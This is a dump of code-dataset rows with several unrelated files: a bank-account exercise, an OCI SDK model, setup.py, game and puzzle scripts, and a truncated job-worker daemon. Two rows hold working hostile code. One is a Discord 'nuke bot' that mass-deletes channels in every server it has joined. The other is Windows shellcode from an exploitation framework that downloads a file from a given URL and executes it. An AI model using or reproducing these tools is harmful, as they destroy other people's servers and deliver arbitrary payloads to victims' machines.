hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795512f209b60bc171b0325ca60273e1b3c8c348 | 2,807 | py | Python | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class Account:
    def __init__(self, custn, accno, opba):
        # Base bank-account record.
        # custn: customer name; accno: account number; opba: opening balance.
        self.custn = custn
        self.accno = accno
        self.opba = opba    # running balance, mutated by deposits/withdrawals
        self.aopen = opba   # frozen copy of the opening balance, for display()
class Current(Account):
    # Current (checking) account with a minimum-balance rule (Python 2 code:
    # print statements, raw_input/input-based interactive construction).
    def __init__(self):
        # Gather the account details interactively from the user.
        custname = raw_input('Enter customer name: ')
        accno = input('Enter customer account number: ')
        opba = input('Enter customer open balance: ')
        Account.__init__(self, custname, accno, opba)
        # Balance below this threshold triggers a penalty in check().
        self.minba = input('Enter minimum required balance: ')
    def deposit(self, deposit=0):
        # Add an amount to the balance (defaults to 0, i.e. a no-op deposit).
        self.opba += deposit
    def check(self):
        # Impose a penalty when the balance is under the minimum.
        # Returns True when the account was in the penalty state, else False.
        if self.opba < self.minba:
            print 'Imposing penalty', 'Low balance!'
            # Penalty charged equals the shortfall below the minimum balance.
            self.opba = self.opba - (self.minba - self.opba)
            return True
        else:
            return False
    def withdraw(self, withdraw):
        # Withdraw an amount; refused if the account is already penalised,
        # otherwise allowed, with a penalty check when it dips below minimum.
        k = self.check()
        if k:
            print 'Withdraw not possible'
        else:
            if self.opba - withdraw >= self.minba:
                self.opba -= withdraw
                print 'Withdrawn', withdraw
            else:
                # NOTE(review): the source dump stripped indentation, so the
                # exact spacing inside this continued string literal is
                # unrecoverable; the runtime text is preserved as shown.
                print 'After withdrawal your balance is below minimum balance\
so you are imposable for penalty.'
                self.opba -= withdraw
                print 'Withdrawn', withdraw
                l = self.check()
    def display(self):
        # Dump the account state (prompt typos preserved verbatim).
        print 'Here is your acount details:'
        print 'Customer name: ', self.custn
        print 'Acccount No.: ', self.accno
        print 'Current Balance: ', self.opba
        print 'Open Balance: ', self.aopen
        print 'Set minimum required balance: ', self.minba
class Savings(Account):
    # Savings account accruing compound interest (Python 2 code).
    def __init__(self):
        custname = raw_input('Enter customer name: ')
        accno = input('Enter customer acount number: ')
        opba = float(input('Enter customer open balance: '))
        Account.__init__(self, custname, accno, opba)
        # Compound interest rate, in percent (presumably annual -- see
        # display(); not enforced anywhere in this code).
        self.cir = input('Enter compound interest rate: ')
    def deposit(self, deposit=0):
        # Add an amount to the balance (defaults to 0, i.e. a no-op deposit).
        self.opba += deposit
    def interest(self):
        # Apply compound interest for a user-supplied number of periods:
        # balance *= (1 + rate/100) ** time.
        time = input('Enter time of interest:')
        self.opba = (self.opba) * ((1 + self.cir / 100.0) ** time)
    def withdraw(self, withdraw):
        # Unlike Current, withdrawals may never take the balance below zero.
        if self.opba - withdraw >= 0:
            self.opba -= withdraw
            print 'Withdrawn', withdraw
        else:
            print 'Withdraw not possible'
    def display(self):
        # Dump the account state (prompt typos preserved verbatim).
        print 'Here is your acount details:'
        print 'Customer name: ', self.custn
        print 'Acccount No.: ', self.accno
        print 'Current Balance: ', self.opba
        print 'Open Balance: ', self.aopen
        print 'Set compound interest (annual): ', self.cir
# main -- interactive demo of both account types:
# first a Current account (deposit, penalty check, withdrawal, report),
# then a Savings account (deposit, interest accrual, withdrawal, report).
a = Current()
a.deposit()
a.check()
bac = input('Enter amount to withdraw')
a.withdraw(bac)
a.display()
b = Savings()
b.deposit()
b.interest()
b.display()
bac = input('Enter amount to withdraw')
b.withdraw(bac)
b.display()
| 32.639535 | 78 | 0.598147 |
7955134bc098c2d1bd913177f240789ebb8a6a73 | 6,736 | py | Python | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateSecurityRecipeDetails(object):
    """
    Information to update in an existing security zone recipe
    """
    # NOTE(review): generated-style OCI SDK model class -- plain data holder
    # whose attributes mirror the service's UpdateSecurityRecipeDetails API
    # payload. Kept verbatim; only commentary added.

    def __init__(self, **kwargs):
        """
        Initializes a new UpdateSecurityRecipeDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param display_name:
            The value to assign to the display_name property of this UpdateSecurityRecipeDetails.
        :type display_name: str

        :param description:
            The value to assign to the description property of this UpdateSecurityRecipeDetails.
        :type description: str

        :param security_policies:
            The value to assign to the security_policies property of this UpdateSecurityRecipeDetails.
        :type security_policies: list[str]

        :param freeform_tags:
            The value to assign to the freeform_tags property of this UpdateSecurityRecipeDetails.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this UpdateSecurityRecipeDetails.
        :type defined_tags: dict(str, dict(str, object))
        """
        # Attribute name -> declared Python type, consumed by the SDK's
        # (de)serialization machinery.
        self.swagger_types = {
            'display_name': 'str',
            'description': 'str',
            'security_policies': 'list[str]',
            'freeform_tags': 'dict(str, str)',
            'defined_tags': 'dict(str, dict(str, object))'
        }
        # Attribute name -> wire (JSON) field name.
        self.attribute_map = {
            'display_name': 'displayName',
            'description': 'description',
            'security_policies': 'securityPolicies',
            'freeform_tags': 'freeformTags',
            'defined_tags': 'definedTags'
        }
        self._display_name = None
        self._description = None
        self._security_policies = None
        self._freeform_tags = None
        self._defined_tags = None

    @property
    def display_name(self):
        """
        **[Required]** Gets the display_name of this UpdateSecurityRecipeDetails.
        The recipe's name

        :return: The display_name of this UpdateSecurityRecipeDetails.
        :rtype: str
        """
        return self._display_name

    @display_name.setter
    def display_name(self, display_name):
        """
        Sets the display_name of this UpdateSecurityRecipeDetails.
        The recipe's name

        :param display_name: The display_name of this UpdateSecurityRecipeDetails.
        :type: str
        """
        self._display_name = display_name

    @property
    def description(self):
        """
        Gets the description of this UpdateSecurityRecipeDetails.
        The recipe's description

        :return: The description of this UpdateSecurityRecipeDetails.
        :rtype: str
        """
        return self._description

    @description.setter
    def description(self, description):
        """
        Sets the description of this UpdateSecurityRecipeDetails.
        The recipe's description

        :param description: The description of this UpdateSecurityRecipeDetails.
        :type: str
        """
        self._description = description

    @property
    def security_policies(self):
        """
        Gets the security_policies of this UpdateSecurityRecipeDetails.
        The list of `SecurityPolicy` ids to include in the recipe

        :return: The security_policies of this UpdateSecurityRecipeDetails.
        :rtype: list[str]
        """
        return self._security_policies

    @security_policies.setter
    def security_policies(self, security_policies):
        """
        Sets the security_policies of this UpdateSecurityRecipeDetails.
        The list of `SecurityPolicy` ids to include in the recipe

        :param security_policies: The security_policies of this UpdateSecurityRecipeDetails.
        :type: list[str]
        """
        self._security_policies = security_policies

    @property
    def freeform_tags(self):
        """
        Gets the freeform_tags of this UpdateSecurityRecipeDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{\"bar-key\": \"value\"}`
        Avoid entering confidential information.

        :return: The freeform_tags of this UpdateSecurityRecipeDetails.
        :rtype: dict(str, str)
        """
        return self._freeform_tags

    @freeform_tags.setter
    def freeform_tags(self, freeform_tags):
        """
        Sets the freeform_tags of this UpdateSecurityRecipeDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
        Example: `{\"bar-key\": \"value\"}`
        Avoid entering confidential information.

        :param freeform_tags: The freeform_tags of this UpdateSecurityRecipeDetails.
        :type: dict(str, str)
        """
        self._freeform_tags = freeform_tags

    @property
    def defined_tags(self):
        """
        Gets the defined_tags of this UpdateSecurityRecipeDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`

        :return: The defined_tags of this UpdateSecurityRecipeDetails.
        :rtype: dict(str, dict(str, object))
        """
        return self._defined_tags

    @defined_tags.setter
    def defined_tags(self, defined_tags):
        """
        Sets the defined_tags of this UpdateSecurityRecipeDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`

        :param defined_tags: The defined_tags of this UpdateSecurityRecipeDetails.
        :type: dict(str, dict(str, object))
        """
        self._defined_tags = defined_tags

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        # Structural equality: compares the full attribute dicts.
        if other is None:
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        # Defined for Python 2 compatibility; delegates to __eq__.
        return not self == other
| 33.182266 | 245 | 0.658254 |
795514397302ff659db956bc26c7e2e2a46ac642 | 6,101 | py | Python | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | 5 | 2021-02-17T14:56:38.000Z | 2022-02-28T01:58:03.000Z | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | null | null | null | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | 4 | 2021-04-10T11:52:22.000Z | 2022-02-26T15:02:15.000Z | # -*- coding: utf-8 -*-
"""
- Usage of this bot is not at all recommended as its against the Terms of Service of discord.
- Your account may get banned if you use this bot.
- You can still make an alt account if you are that desperate.
- The bot requires `Manage Channels` permission in every server.
- Deletes (or at least tries to) delete all the channels accessible to the bot.
- Use this at your own risk.
- Channels once deleted cannot come back.
- Made strictly for educational purposes only.
- I won't be responsible for any stupid things which any of you might not / might do.
"""
# imports
import json
import sys
from colorama import Fore, Style
import discord
import asyncio as aio
import random as rd
from discord.ext import commands as NukeBot
# set up the bot
it = discord.Intents.default() # privileged intents are not really required
bot = NukeBot.Bot(command_prefix="!", intents=it, chunk_guilds_at_startup=False) # the main Bot instance
# other stuff
intro = f"""- USE THIS AT YOUR OWN RISK. Read this for full info: https://github.com/Videro1407/nuke-bot/blob/main/README.md
- Made strictly for educational purposes by @Videro1407: https://linktr.ee/videro
- I won't be responsible for any stupid things which any of you might not / might do."""
NukeBotHitFont = """
███╗░░██╗██╗░░░██╗██╗░░██╗███████╗ ██████╗░░█████╗░████████╗
████╗░██║██║░░░██║██║░██╔╝██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝
██╔██╗██║██║░░░██║█████═╝░█████╗░░ ██████╦╝██║░░██║░░░██║░░░
██║╚████║██║░░░██║██╔═██╗░██╔══╝░░ ██╔══██╗██║░░██║░░░██║░░░
██║░╚███║╚██████╔╝██║░╚██╗███████╗ ██████╦╝╚█████╔╝░░░██║░░░
╚═╝░░╚══╝░╚═════╝░╚═╝░░╚═╝╚══════╝ ╚═════╝░░╚════╝░░░░╚═╝░░░"""
# print the info
print(Fore.RED + Style.BRIGHT + NukeBotHitFont)
print(Fore.GREEN + Style.BRIGHT + intro)
# config load
config = json.loads(open('config.json', 'r').read())
# speed config
Time = 5
speed = input(Fore.BLUE + Style.BRIGHT + f"At what speed do you want to nuke the channels?\n"
f"Options available: slow, medium, fast, insane\n")
if speed.lower() == 'slow':
Time = 10
elif speed.lower() == 'medium':
Time = 5
elif speed.lower() == 'fast':
Time = 3
elif speed.lower() == 'insane':
Time = 1
elif speed.lower() == 'godly': # lil' easter egg
Time = 1 / 2
elif int(speed) == 1:
Time = 10
elif int(speed) == 2:
Time = 5
elif int(speed) == 3:
Time = 3
elif int(speed) == 4:
Time = 1
elif int(speed) == 5: # lil' easter egg
Time = 1 / 2
else:
print(f'Invalid speed entered, default speed selected.')
Time = 5
print(f"Speed: 1 channel per {Time} second{'s' if Time > 1 else ''}")
# logging in message
print(f"Bot is logging in...")
async def NukeAllChannels(): # main task
gone = 0 # number of channels deleted
not_gone = 0 # number of channels which could not be deleted
while True: # while loop
try:
await bot.wait_until_ready() # wait till the bot is ready and logged in
if len(list(bot.get_all_channels())) == 0: # if there are no channels
print(Fore.RED+Style.BRIGHT+f"[NO CHANNELS]: The bot `{str(bot.user)}` has access to no channels.")
sys.exit() # exit the script
r1 = rd.randint(1, 10) # random number from 1 to 10
if r1 == 5: # this will be displayed randomly
print(f'Total channels discovered: {gone + not_gone} channels\n'
f'Total channels deleted: {gone} channels')
for channel in bot.get_all_channels(): # get all the abc.GuildChannels
await aio.sleep(Time) # speed of deleting the channels
try:
await channel.delete(reason=f"Nuke Bot") # delete the channel
print(Fore.GREEN + Style.BRIGHT + f"[SUCCESS]: Deleted {channel.name} ({channel.id}).\n"
f" Guild: {channel.guild.name} ({channel.guild.id})\n"
f" Total Channels Deleted: {gone}") # print it
gone += 1 # add 1 to `gone`
except Exception as e: # error handling
if isinstance(e, discord.Forbidden): # the bto does not have perms to delete the channel
not_gone += 1 # add 1 to `not_gone`
print(Fore.RED+Style.BRIGHT+f'[MISSING ACCESS]: Could not delete {channel.name} ({channel.id})\n'
f' Guild: {channel.guild.name} ({channel.guild.id})\n'
f' Channels not deleted: {not_gone}') # print it
pass # pass/ignore the exception
else: # any unknown error
not_gone += 1 # add 1 to `not_gone`
print(Fore.RED+Style.BRIGHT+f'[OTHER ERROR]: Could not delete {channel.name} ({channel.id})\n'
f' Guild: {channel.guild.name} ({channel.guild.id})\n'
f' Channels not deleted: {not_gone}') # print it
pass # pass/ignore the exception
except RuntimeError: # Tried to do this but it didn't quite work
print(Fore.GREEN + Style.BRIGHT + f"Try inviting the bot into other servers.")
@bot.event # event decorator
async def on_ready(): # when the bot has logged in and is ready to go
print(Fore.GREEN + Style.BRIGHT + f"Logged in as {str(bot.user)} ({bot.user.id})") # print that we are ready
await aio.sleep(0.5) # little delay before the next print
all_channels = len(list(bot.get_all_channels()))
print(Fore.GREEN + Style.BRIGHT + f"Starting nuking channels..\n"
f"Total Channels Accessible: {all_channels}") # print the channels accessible
bot.loop.create_task(NukeAllChannels()) # create the task here
bot.run(config['BOT_TOKEN']) # run the bot (connect + login)
| 47.294574 | 124 | 0.556466 |
7955144ef8586cd58e0b4b975da9f9f5849f5385 | 1,927 | py | Python | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 5 | 2017-02-02T21:07:51.000Z | 2021-02-16T18:34:16.000Z | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 14 | 2016-11-29T00:36:04.000Z | 2018-04-05T20:09:02.000Z | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 1 | 2017-02-02T21:07:38.000Z | 2017-02-02T21:07:38.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup, find_packages
import codecs
import chandl
def _read_file(name, encoding='utf-8'):
"""
Read the contents of a file.
:param name: The name of the file in the current directory.
:param encoding: The encoding of the file; defaults to utf-8.
:return: The contents of the file.
"""
with codecs.open(name, encoding=encoding) as f:
return f.read()
setup(
    name='chandl',
    # Version is single-sourced from the package itself (chandl.__version__).
    version=chandl.__version__,
    description='A lightweight tool for parsing and downloading 4chan threads.',
    # Reuse the README as the PyPI long description.
    long_description=_read_file('README.rst'),
    license='MIT',
    url='https://github.com/gebn/chandl',
    author='George Brighton',
    author_email='oss@gebn.co.uk',
    packages=find_packages(),
    install_requires=[
        'six>=1.9.0',
        'Unidecode',
        'bleach',
        'requests',
        'httmock',
        'progress',
        'pytz',
        'pyfakefs'
    ],
    # Tests are run through nose (python setup.py test).
    test_suite='nose.collector',
    tests_require=[
        'nose'
    ],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'Intended Audience :: End Users/Desktop',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Software Development :: Libraries :: Python Modules'
    ],
    # Installs a `chandl` console command pointing at the CLI entry point.
    entry_points={
        'console_scripts': [
            'chandl = chandl.__main__:main_cli',
        ]
    }
)
7955147a7382577cd1e4eae4e819330640885547 | 723 | py | Python | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | def commandPeasant(peasant, coins):
coin = peasant.findNearest(coins)
if coin:
hero.command(peasant, "move", coin.pos)
friends = hero.findFriends()
peasants = {
"Aurum": friends[0],
"Argentum":friends[1],
"Cuprum":friends[2]
}
while True:
items = hero.findItems()
goldCoins = [];
silverCoins = [];
bronzeCoins = [];
for item in items:
if item.value == 3:
goldCoins.push(item)
elif item.value == 2:
silverCoins.push(item)
elif item.value == 1:
bronzeCoins.push(item)
commandPeasant(peasants.Aurum, goldCoins)
commandPeasant(peasants.Argentum, silverCoins)
commandPeasant(peasants.Cuprum, bronzeCoins)
| 24.931034 | 50 | 0.618257 |
795514803fcf962e8a3da1e0ce1ddb9532605ffe | 106 | py | Python | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | def f(N, K):
return 50 * N + 500 * N // (8 + 2 * K)
A, B = map(int, input().split())
print(f(A, B))
| 15.142857 | 42 | 0.45283 |
7955151e1396190c6d41fd42bcfc18be1575cf68 | 1,875 | py | Python | shell/database/Windows/downloadandexecute.py | vasco2016/shellsploit-framework | 04eb4a0449acaba0b70c40a78c61a0d5e2527406 | [
"MIT"
] | 61 | 2017-06-13T13:48:38.000Z | 2022-03-02T17:43:45.000Z | shell/database/Windows/downloadandexecute.py | security-geeks/shellsploit-framework | 93b66ab9361872697eafda2125b37005f49116be | [
"MIT"
] | null | null | null | shell/database/Windows/downloadandexecute.py | security-geeks/shellsploit-framework | 93b66ab9361872697eafda2125b37005f49116be | [
"MIT"
] | 28 | 2017-08-15T05:38:27.000Z | 2020-12-31T03:39:38.000Z | #https://packetstormsecurity.com/files/119812/Allwin-URLDownloadToFile-WinExec-ExitProcess-Shellcode.html
#Author: RubberDuck
#WORK
def downANDexecute( URL,FILENAME):
shellcode = r"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"
shellcode += r"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53"
shellcode += r"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"
shellcode += r"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81"
shellcode += r"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"
shellcode += r"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64"
shellcode += r"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3"
shellcode += r"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3"
shellcode += r"\x8B\x14\x8E\x03\xD3\x33\xC9\x51"
shellcode += FILENAME
shellcode += r"\x53\x52"
shellcode += r"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62"
shellcode += r"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2"
shellcode += r"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C"
shellcode += r"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C"
shellcode += r"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24"
shellcode += r"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33"
shellcode += r"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64"
shellcode += r"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C"
shellcode += r"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24"
shellcode += r"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83"
shellcode += r"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68"
shellcode += r"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57"
shellcode += r"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D"
shellcode += r"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A"
shellcode += r"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03"
shellcode += r"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69"
shellcode += r"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF"
shellcode += r"\xFF\xFF"
shellcode += URL
return shellcode
| 46.875 | 105 | 0.666667 |
795515589bd4688da923bb7a753aa2e0741502b1 | 1,348 | py | Python | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | 3 | 2018-08-15T18:50:35.000Z | 2018-08-15T19:04:46.000Z | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | null | null | null | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | 1 | 2018-08-15T18:50:46.000Z | 2018-08-15T18:50:46.000Z | #The four adjacent digits in the 1000-digit number that have
# the greatest product are 9 × 9 × 8 × 9 = 5832.
#
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
#
#
#
#Find the thirteen adjacent digits in the 1000-digit
#number that have the greatest product. What is the value
#of this product? | 46.482759 | 61 | 0.875371 |
79551697004dbde40f969c8d977a279af9045eb3 | 7,706 | py | Python | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 680 | 2018-10-29T12:12:10.000Z | 2019-04-27T09:52:58.000Z | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 110 | 2018-10-29T12:33:34.000Z | 2019-02-14T02:31:43.000Z | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 92 | 2018-10-29T12:21:12.000Z | 2019-06-08T11:08:08.000Z | # Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0
# -------------------------------------------------------------------------
# daemon.py - this is the main entry point for each worker process. It
# doesn't fork. The build will periodically check to see if it is flagged
# as one that should be stopped, and if so, will self terminate. Logic
# is mostly in 'builder.py'.
# --------------------------------------------------------------------------
import time
import traceback
from datetime import datetime, timedelta
import sys
from django.db import transaction
from django.utils import timezone
from django.db import DatabaseError
from vespene.common.logger import Logger
from vespene.models.build import (ABORTED, ABORTING, ORPHANED, QUEUED, Build)
from vespene.models.organization import Organization
from vespene.models.worker_pool import WorkerPool
from vespene.workers.builder import BuildLord
from vespene.workers.scheduler import Scheduler
from vespene.workers.importer import ImportManager
LOG = Logger()
FLAG_ABORTED_AFTER_ABORTING_MINUTES = 1
#==============================================================================
class Daemon(object):
"""
Worker main loop.
This doesn't have any daemonization code at the moment, it is expected you would run it from supervisor,
wrapped by ssh-agent
"""
# -------------------------------------------------------------------------
def __init__(self, pool_name, max_wait_minutes=-1, max_builds=-1, build_id=-1):
"""
Create a worker that serves just one queue.
"""
self.pool = pool_name
self.max_wait_minutes = max_wait_minutes
self.build_counter = max_builds
self.reload()
self.ready_to_serve = False
self.time_counter = datetime.now(tz=timezone.utc)
if build_id >= 0:
# If worker is started for one specific build,
# we don't wait and only process one build.
self.max_wait_minutes = -1
self.build_counter = 1
self.build_id = build_id
else:
self.build_id = None
LOG.info("serving queue: %s" % self.pool)
# -------------------------------------------------------------------------
def reload(self):
pools = WorkerPool.objects.filter(name=self.pool)
if pools.count() != 1:
LOG.error("worker pool does not (yet?) exist: %s" % self.pool)
self.pool_obj = None
else:
self.pool_obj = pools.first()
# -------------------------------------------------------------------------
def run(self):
"""
Main loop.
"""
while True:
try:
self.reload()
if self.pool_obj is not None:
self.body()
except Exception:
traceback.print_exc()
finally:
if self.pool_obj is not None:
time.sleep(self.pool_obj.sleep_seconds)
else:
time.sleep(60)
# -------------------------------------------------------------------------
def find_build(self, build_id=None):
if build_id is not None:
try:
return Build.objects.get(pk=self.build_id)
except Build.DoesNotExist:
LOG.debug("no build with id %s, exiting" % str(self.build_id))
sys.exit(1)
else:
# try to run any build queued in the last interval <default: 1 hour>, abort all other builds
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=self.pool_obj.auto_abort_minutes)
builds = Build.objects.filter(
status = QUEUED,
worker_pool__name = self.pool,
queued_time__gt = threshold
)
count = builds.count()
if count == 0:
return None
first = builds.order_by('id').first()
with transaction.atomic():
try:
first = Build.objects.select_for_update(nowait=True).get(id=first.pk)
except DatabaseError:
return None
if count > 1 and self.pool_obj.build_latest:
self.cleanup_extra_builds(first)
return first
# -------------------------------------------------------------------------
def cleanup_extra_builds(self, first):
rest = Build.objects.filter(
status = QUEUED,
project = first.project
).exclude(
id = first.pk
)
rest.update(status=ABORTED)
# -------------------------------------------------------------------------
def cleanup_orphaned_builds(self):
# builds that are queued for too long...
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=self.pool_obj.auto_abort_minutes)
orphaned = Build.objects.filter(
status=QUEUED,
project__worker_pool__name = self.pool,
queued_time__lt = threshold
)
for orphan in orphaned.all():
LOG.warn("build %s was in queued status too long and not picked up by another worker, flagging as orphaned" % orphan.id)
orphaned.update(status=ORPHANED)
# builds that haven't been aborted in too long for ANY worker pool
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=FLAG_ABORTED_AFTER_ABORTING_MINUTES)
orphaned = Build.objects.filter(
status=ABORTING,
queued_time__lt = threshold
)
for orphan in orphaned.all():
LOG.warn("build %s was in aborting status too long, assuming successfully aborted" % orphan.id)
orphaned.update(status=ABORTED)
# -------------------------------------------------------------------------
